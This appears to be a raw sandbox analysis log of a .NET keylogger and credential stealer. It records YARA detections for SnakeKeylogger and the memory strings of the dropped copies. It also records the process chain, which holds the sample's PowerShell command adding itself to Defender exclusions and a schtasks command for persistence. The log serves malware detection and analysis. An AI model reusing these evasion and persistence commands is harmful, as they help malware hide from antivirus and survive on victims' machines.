Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015EC146	19_2_015EC146
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015EA088	19_2_015EA088
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015E5362	19_2_015E5362
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015ED278	19_2_015ED278
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015EC468	19_2_015EC468
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015EC738	19_2_015EC738
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015EE988	19_2_015EE988
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015E69A0	19_2_015E69A0
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015E3B95	19_2_015E3B95
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015ECA08	19_2_015ECA08
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015ECCD8	19_2_015ECCD8
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015E6FC8	19_2_015E6FC8
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015ECFA9	19_2_015ECFA9
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015E3E09	19_2_015E3E09
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015EF631	19_2_015EF631
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015EE97A	19_2_015EE97A
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015E29EC	19_2_015E29EC
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015EFA88	19_2_015EFA88
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 19_2_015E3AA1	19_2_015E3AA1

Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 00000001.00000000.1269055635.00000000002A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewDGx.exe4 vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 00000001.00000002.1313982240.00000000068C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 00000001.00000002.1316854630.0000000007880000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003638000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 00000001.00000002.1299290995.0000000002631000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 00000001.00000002.1299290995.00000000028A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 00000001.00000002.1295846767.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 00000001.00000002.1302654676.000000000367C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 0000000E.00000002.3724190337.00000000010F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ckHregxJIq.exe
Source: ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000043D000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs ckHregxJIq.exe
Source: ckHregxJIq.exe	Binary or memory string: OriginalFilenamewDGx.exe4 vs ckHregxJIq.exe

Source: ckHregxJIq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: ckHregxJIq.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: aFAsiNcQRJEVeL.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, pJJpnbhNcqddPKB5Gi.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, pJJpnbhNcqddPKB5Gi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, pJJpnbhNcqddPKB5Gi.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, agAuJ8ltVMCIOf31qe.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, agAuJ8ltVMCIOf31qe.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/15@3/3

Source: C:\Users\user\Desktop\ckHregxJIq.exe

File created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03

Source: C:\Users\user\Desktop\ckHregxJIq.exe

File created: C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp

Jump to behavior

Source: ckHregxJIq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ckHregxJIq.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\ckHregxJIq.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ckHregxJIq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003373000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.000000000334E000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003340000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003330000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.000000000337F000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003202000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000320F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ckHregxJIq.exe	ReversingLabs: Detection: 81%
Source: ckHregxJIq.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\ckHregxJIq.exe

File read: C:\Users\user\Desktop\ckHregxJIq.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
